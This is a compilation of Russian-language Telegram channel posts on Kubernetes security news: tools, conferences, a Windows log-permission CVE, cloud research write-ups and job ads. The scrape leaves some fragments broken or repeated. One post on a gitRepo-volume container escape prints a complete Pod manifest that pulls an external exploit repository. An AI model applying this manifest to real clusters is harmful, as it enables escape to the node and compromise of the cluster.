Некоторое время назад мы уже писали про Cloud Threat Landscape и вот он обновился и там появился раздел Defenses. В данном разделе собраны защитные меры для противодействиям облачным атакам с кратким описанием и мапингом на D3FEND тактики. В общем, полезная вещь для систематизации своих знаний в данной области)
👍11❤1🥰1
Наша команда Luntry очень любит тему
Речь идёт о проекте VpK, что является акронимом для
observability
и красивую визуализацию. И данный проект нас не оставил равнодушными!Речь идёт о проекте VpK, что является акронимом для
Visually presented Kubernetes
. В данном инструменте есть много и разных способов визуализации ресурсов в кластере! Подробнее о проекте можно узнать из документации. Отдельно обратите внимание на режим Security, который посвящен RBAC
(и очень сильно напоминает rbac-tool).👍22🔥12❤2
Статья How to create a multi clusters secure supply chain (SLSA 3) in 10min (OSS edition) будет хорошей отправной точкой, если вы хотите построить
В этой статье представлено пошаговое руководство по созданию собственной безопасной цепочки поставок. Применяя описанные лучшие практики, вы сможете лучше защитить инфраструктуру на базе
P.S. – все материалы используемые в статье доступны в репозитории тут.
P.P.S – вопрос безопасности Supply Chain в Kubernetes мы поднимали в свежем докладе "Механизмы Kubernetes против атак supply chain"
Supply Chain Security
на базе Kubernetes
в своей инфраструктуре.В этой статье представлено пошаговое руководство по созданию собственной безопасной цепочки поставок. Применяя описанные лучшие практики, вы сможете лучше защитить инфраструктуру на базе
Kubernetes
от потенциальных уязвимостей в приложениях и сохранить их целостность на протяжении всего их жизненного цикла.P.S. – все материалы используемые в статье доступны в репозитории тут.
P.P.S – вопрос безопасности Supply Chain в Kubernetes мы поднимали в свежем докладе "Механизмы Kubernetes против атак supply chain"
👍13🔥2❤1🆒1
"Advanced Linux Detection and Forensics Cheatsheet" - полезный систематизирующий документ по моментам связанным с обнаружением и расследованием инцидентов в
Linux
. Вы определенно можете отметить как много всего есть и как много куда надо смотреть в Linux
(и от этого даже может заболеть голова). В документе упоминается и ряд моментов связанных с контейнерами и K8s
. Но если прям специализироваться и затачиваться под последнее, то на их специфике можно сделать много всего интересного и очень полезного. Об этом мы как раз расскажем и покажем на будущем вебинаре «Ловим злоумышленников и собираем улики в контейнерах Kubernetes».👍15🔥3❤2
Исследователь безопасности из
Чтобы сбежать из контейнера таким способом, нужно определенным образом сконфигурировать
Интересно, что данной проблеме не присвоили
Для того чтобы детальней ознакомиться с техническими подробностями уязвимостями советуем изучить статью
Google Imre Rad
нашел способ побега из контейнера в Kubernetes
через deprecated volumes
(начиная с 1.11) – gitRepo
. Для эксплуатации необходимо соблюсти три условия: поддержка gitRepo volume type
, наличие git
бинаря на Node и отсутствие ограничений на использование gitRepo volume type
.Чтобы сбежать из контейнера таким способом, нужно определенным образом сконфигурировать
git
репозиторий и выставить gitRepo
в манифесте:
apiVersion: v1
kind: Pod
metadata:
name: test-pd
spec:
containers:
- image: alpine:latest
command: ["sleep","86400"]
name: test-container
volumeMounts:
- mountPath: /gitrepo
name: gitvolume
volumes:
- name: gitvolume
gitRepo:
directory: g/.git
repository: https://github.com/raesene/repopodexploit.git
revision: main
Интересно, что данной проблеме не присвоили
CVE
, хотя она может привести к побегу из контейнера. Автор, обнаруживший проблему уже закинул PR, фикс стоит ожидать во всех поддерживаемых версиях.Для того чтобы детальней ознакомиться с техническими подробностями уязвимостями советуем изучить статью
Imre Rad
– Sneaky write hook: git clone to root on k8s node. Также Rory McCune
в статье Fun With GitRepo Volumes показал чего может добиться злоумышленник, используя данную уязвимость👍14🔥5❤1👾1
В полку
- Мутационными
- Валидационными
- Генерационными
Политики это специальные
-
-
Подробнее о проекте можно почитать тут или спросить в комментариях к данному посту и авторы проекта ответят ;)
P.S. Проект молодой, но по общению с командой планируются и
P.S.S. В Luntry уже есть интеграция с
PoliceEngine
случилось пополнение и к Kyverno
, OPA Gatekeeper
, Kubewarden
, JSPolicy
присоединился Kubelatte! При этом kubelatte
это отечественная разработка ребят из СберТех. Данный движок может похвастаться сразу 3
типами политик:- Мутационными
- Валидационными
- Генерационными
Политики это специальные
CRD
, где сами правила можно писать с помощью двух синтаксисов:-
rego
-
simples
(jmespath
+ regexp
)Подробнее о проекте можно почитать тут или спросить в комментариях к данному посту и авторы проекта ответят ;)
P.S. Проект молодой, но по общению с командой планируются и
backgroundscan
, и проверка SBOM
, и проверка подписи образа!P.S.S. В Luntry уже есть интеграция с
Kyverno
, OPA Gatekeeper
, а такими темпами и с kubelatte
добавим ;)👍29🔥9🤨6❤1💩1🤡1
Стали доступны видео докладов с прошедшей конференции CloudNativeSecurityCon North America 2024. Слайды доступны на сайте конференции.
Определенно рекомендуем ознакомиться с ними.
Определенно рекомендуем ознакомиться с ними.
YouTube
CloudNativeSecurityCon North America 2024
Share your videos with friends, family, and the world
👍6🔥2❤1
Читатели нашего канала недавно поделились с нами своей статьей "Threat Detection in the K8s Environment" в которой рассказывают об опыте работы своего
В общем, очень рекомендуем для изучения (ребята молодцы!), особенно в преддверии нашего сегодняшнего вебинара «Ловим злоумышленников и собираем улики в контейнерах Kubernetes» в
P.S. Если вы написали статью или инструмент по тематике канала, то не стесняйтесь скидывать =)
SOC
в Kubernetes
. В статье идет речь про кастомный Tetragon
и анализ Kubernetes Audit Log
. К правилам/сигнатурам для Tetragon
(как и ко всем правилам) есть вопросы, но вот Audit Policy
(она полностью приводится в статье и ее можно взять за базу) и сценарии анализа ее результатов очень классные. Единственное, что на наш взгляд тут можно было бы добавить это сочетание использования с PolicyEngine
(в статье о данном клаcсе решений ничего не говориться), чтобы предотвратить множество кейсов и не доводить их до расследования вообще.В общем, очень рекомендуем для изучения (ребята молодцы!), особенно в преддверии нашего сегодняшнего вебинара «Ловим злоумышленников и собираем улики в контейнерах Kubernetes» в
11:00
, где мы покажем как, на пример, можно ловить переименования бинарей (для bypass rules
) вообще без правил/сигнатур/аномалий и при этом собрать артефакты для forensic
;)P.S. Если вы написали статью или инструмент по тематике канала, то не стесняйтесь скидывать =)
Medium
Threat Detection in the K8s Environment
Discover what tools our SOC team uses to detect malicious activity on our clusters
👍23🥰6🔥4
Если вы занимаетесь пентестами, то наверняка слышали о такой утилите как
Так вот ребята из
Всё это доступно в темплейтах версии
nuclei
. Эта тулза является очень гибким и легко кастомизируемым vulnerability
сканером, благодаря templates
, которые пишутся на YAML.Так вот ребята из
ProjectDiscovery
(авторы тулзы) решили пойти дальше и добавить темплейты для сканирования Kubernetes
кластера:- Deployment Configurations Review
- Network Policies Enforcement
- Pod Security Standards
- Compliance and Configuration Management
- Security Contexts and Roles
- Logging and Monitoring
- Secrets Management
- Vulnerability Scanning and Patch Management
Всё это доступно в темплейтах версии
9.9.0
. Естественно их можно кастомизировать – писать кастомные проверки, compliance и прочее.🔥32❤6🥰4👍1
На нашем сайте в разделе Исследования уже стали доступны и слайды, и видеозапись вебинара "Ловим злоумышленников и собираем улики в контейнерах Kubernetes", который мы проводили вчера. Так что если вы вчера не смогли присутствовать
Там мы рассмотрели:
- способы обнаружения злоумышленника в контейнерных окружениях
- какие подходы смогут эффективно помочь в расследовании и реагировании инцидентов
- возможности Luntry, необходимые для
И отдельный таймкод на последнюю часть с
Как всегда если есть вопросы, то пишите в комментариях.
online
, то уже есть возможность все изучить в записи!Там мы рассмотрели:
- способы обнаружения злоумышленника в контейнерных окружениях
- какие подходы смогут эффективно помочь в расследовании и реагировании инцидентов
- возможности Luntry, необходимые для
Incident Response
И отдельный таймкод на последнюю часть с
live demo
.Как всегда если есть вопросы, то пишите в комментариях.
👍17🔥8🫡1
В блоге BugHunters компании
1) acjs -
2) ctrdac - адаптер для первого проекта, чтобы можно было его использовать за пределами
Первый проект по сути аналог JSPolicy.
Второй проект это по сути OPA с интеграцией с
В связи с существующими
Google
вышла статья "Securing the Container World with Policies: acjs and ctrdac", где они представляют общественности два своих инструмента:1) acjs -
PolicyEngine
для Kubernetes
с возможностью мутационных и валидационных политик на JavaScript
.2) ctrdac - адаптер для первого проекта, чтобы можно было его использовать за пределами
Kubernetes
c чистыми Docker/containerd
.Первый проект по сути аналог JSPolicy.
Второй проект это по сути OPA с интеграцией с
Docker
(с containerd
не встречали) .В связи с существующими
PolicyEngine
для Kubernetes
, в сценарий использования этих инструментов там не особо верится, а вот в сценарий вне Kubernetes
вполне возможно!👍9❤2🔥2
Если у вас
Уязвимость позволяет
Бага затрагивает версии
Kubernetes
кластер на Windows
(ну мало ли), то поспешите обновиться, ведь вышла новая CVE-2024-5321: Incorrect permissions on Windows containers logs с оценкой по CVSS
– 6.1 (Medium
).Уязвимость позволяет
BULTIN\Users
читать логи контейнеров, а NT AUTHORITY\Authenticated Users
модифицировать логи контейнеров.Бага затрагивает версии
kubelet <= 1.27.15, 1.28.11, 1.29.6, 1.30.3
. Необходимые патчи уже выпущены.GitHub
CVE-2024-5321: Incorrect permissions on Windows containers logs · Issue #126161 · kubernetes/kubernetes
CVSS Rating: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N - MEDIUM (6.1) A security issue was discovered in Kubernetes clusters with Windows nodes where BUILTIN\Users may be able to read container ...
😁16🤣8👍4🔥3❤2
В одной из последних версий проекта Sigmа, обновился набор правил касающихся
В общем на заметку специалистам
Kubernetes
- теперь их там стало 15
. Для тех кто не в курсе что такое Sigma
, то рассказываем - это Generic Signature Format for SIEM Systems
со своей библиотекой правил! Можно использовать проект как по прямому назначению, так и просто подсматривая правила ;)В общем на заметку специалистам
SOC
.🔥17👍6❤2😁1
Все слайды и видеозаписи докладов с конференции БеКон 2024!
Изучайте, учитесь и делайте свои контейнерные инфраструктуре безопаснее вместе с нами!
Изучайте, учитесь и делайте свои контейнерные инфраструктуре безопаснее вместе с нами!
🔥30👍10❤9🥰4❤🔥3
SAPwned: SAP AI vulnerabilities expose customers’ cloud environments and private AI artifacts – интересная статья от исследователей из
Интересно, что изначально пользователи
Но простой трюк со сменой
WIZ
, в которой они описывают полную цепочку захвата Kubernetes
кластера.Интересно, что изначально пользователи
SAP AI
могли создавать собственные нагрузки, используя Argo Workflow
, но они были строго ограничены по securityContext
и сети с помощью Istio
.Но простой трюк со сменой
UID
на 1337
(об этом мы рассказывали тут) позволил ресерчерам обойти сетевые ограничения, насканить сеть, найти AWS token
, получить пользовательские данные из S3
хранилища и захватить кластер целиком через Unauthenticated Helm Tiller
.wiz.io
SAPwned: SAP AI vulnerabilities expose customers’ cloud environments and private AI artifacts | Wiz Blog
Wiz Research uncovers vulnerabilities in SAP AI Core, allowing malicious actors to take over the service and access customer data.
👍14🔥2😁2
Как-то мы спрашивали Вас про ваше отношение к публикации на данном канале вакансий связанных чисто с
Мы хорошо понимаем актуальность данной темы, высокий спрос на данных специалистов и все сложности поиска специалистов данного направления. В контексте этого настоятельно рекомендуем ознакомиться со слайдами и видеозаписью доклада "Почему защитой k8s должно заниматься целое подразделение?" от Артема Мерец с прошедшего БеКон 2024.
При этом у нас тут собрана как раз та самая целевая аудитория: кто-то только начинает делать первые шаги в данной области, кто-то уже давно защищает кластера в своих компаниях, кто-то давно занимается разворачиваем и сопровождением
Мы решили помочь компаниям в поисках таких специалистов и публиковать вакансии, направленные на специалистов по безопасности
Kubernetes security
. И большинство высказалось положительно на этот счет. Мы хорошо понимаем актуальность данной темы, высокий спрос на данных специалистов и все сложности поиска специалистов данного направления. В контексте этого настоятельно рекомендуем ознакомиться со слайдами и видеозаписью доклада "Почему защитой k8s должно заниматься целое подразделение?" от Артема Мерец с прошедшего БеКон 2024.
При этом у нас тут собрана как раз та самая целевая аудитория: кто-то только начинает делать первые шаги в данной области, кто-то уже давно защищает кластера в своих компаниях, кто-то давно занимается разворачиваем и сопровождением
K8s
и хочется заняться ИБ, кто-то давно работает в SOC
и хочет немного сменить фокус и т.д.Мы решили помочь компаниям в поисках таких специалистов и публиковать вакансии, направленные на специалистов по безопасности
Kubernetes
(это строгое ограничение). По всем вопросам можно писать контакту указанному в профиле.Telegram
k8s (in)security
Периодически компании обращаются с вопросом о возможности публиковать на данном канале вакансии связанные с `Kubernetes security`. И компаниям хочется помочь, и чтобы рекламы было минимум. Хочу узнать ваше мнение. Быть или не быть постам с вакансиями?
Нет…
Нет…
👍35
Крутой лонгрид "Attacking Pipeline".
Рассмотренные атаки:
-
-
-
-
-
-
-
-
8
типов атак с различными сценариями представлены по шагам с рекомендациями по обеспечению безопасности (и все это с понятными примерами)!Рассмотренные атаки:
-
Control of common registry
-
Direct PPE (d-PPE)
-
Indirect PPE (i-PPE)
-
Public PPE
-
Changes in repository
-
Inject in Artifacts
-
User/Services credentials
-
Typosquatting docker registry image
🔥16❤4🥰1
Авито в поиске талантливого специалиста, который возьмёт на себя лидерство в направлении безопасности
В компании выстроен зрелый процесс безопасной разработки, включающий в себя статический и динамический анализ приложений, поиск секретов и персональных данных, анализ зависимостей и множество других решений для максимально быстрого и точного обнаружения проблем.
Уже собралась крутая команда, состоящая из
Что предстоит делать?
⭐️ Строить основные процессы безопасности
⭐️ Разрабатывать и внедрять механизмы защиты от основных угроз для контейнерных сред (
⭐️ Консультировать и обучать
Почему Авито?
🔥 Классифайд №1 в мире по версии сервиса SimilarWeb
🔥 Огромная распределённая инфраструктура
🔥 Можно работать как в комфортных офисах в Москве, Санкт-Петербурге, Самаре, Казани или в коворкинге в Ереване, так и полностью удалённо
🔥 Достойная заработная плата (до 500 000 руб)
🔥 Дико флексим на team-get-together
Откликайтесь
Kubernetes
.В компании выстроен зрелый процесс безопасной разработки, включающий в себя статический и динамический анализ приложений, поиск секретов и персональных данных, анализ зависимостей и множество других решений для максимально быстрого и точного обнаружения проблем.
Уже собралась крутая команда, состоящая из
AppSec
, Security BP
, команды разработки и для полного счастья нужен инженер по безопасности k8s.Что предстоит делать?
⭐️ Строить основные процессы безопасности
Kubernetes
⭐️ Разрабатывать и внедрять механизмы защиты от основных угроз для контейнерных сред (
OWASP TOP 10 Kubernetes/Docker
)⭐️ Консультировать и обучать
DevOps
и администраторов по настройкам безопасностиПочему Авито?
🔥 Классифайд №1 в мире по версии сервиса SimilarWeb
🔥 Огромная распределённая инфраструктура
🔥 Можно работать как в комфортных офисах в Москве, Санкт-Петербурге, Самаре, Казани или в коворкинге в Ереване, так и полностью удалённо
🔥 Достойная заработная плата (до 500 000 руб)
🔥 Дико флексим на team-get-together
Откликайтесь
👍15👎12😁7🔥2
Классный исследователь безопасности и по совместительству подписчик нашего телеграм канала
100
Luis Toro Puig
совсем недавно выступил на конференции EuskalHack
с воркшопом Kubernetes Security Fundamentals
. Доклад затронул, наверное, все самые базовые темы в направлении Kubernetes Security.100
must-have
слайдов можно найти тут.🔥17👍8👏2